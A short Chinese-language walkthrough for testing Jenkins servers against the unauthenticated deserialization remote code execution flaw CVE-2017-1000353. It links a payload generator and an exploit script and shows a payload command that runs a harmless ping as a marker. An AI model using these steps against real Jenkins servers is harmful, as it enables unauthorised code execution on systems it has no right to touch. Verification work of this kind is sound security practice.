Jenkins遠程代碼執行漏洞檢查(CVE-2017-1000353）

Jenkins的反序列化漏洞，攻擊者使用該漏洞能夠在被攻擊服務器執行任意代碼，漏洞利用不須要任何的權限

漏洞影響範圍：

全部Jenkins主版本均受到影響(包括<=2.56版本)
全部Jenkins LTS 均受到影響( 包括<=2.46.1版本)

測試步驟：

1.下載生成反序列的payload:

https://github.com/nobleXu/jenkins

2.生成一個jenkins_poc1.ser反序列文件

java  -jar  jenkins_payload.jar  jenkins_poc1.ser  "ping www.baidu.com"

3.下載jenkins.py文件：

下載連接: https://pan.baidu.com/s/1misPilU 密碼: 6qqh

4.編輯jenkins.py文件,修改url地址：

 

5.執行jenkins.py：

python3  exploit.py

6.經過dnslog能夠看到反序列請求日誌記錄：

 

 測試總結：

Jenkins運行環境是在linux下，win環境利用不成功

參考文獻：

https://github.com/phith0n/vulhub/tree/master/jenkins/CVE-2017-1000353

https://blogs.securiteam.com/index.php/archives/3171

https://xianzhi.aliyun.com/forum/read/1567.html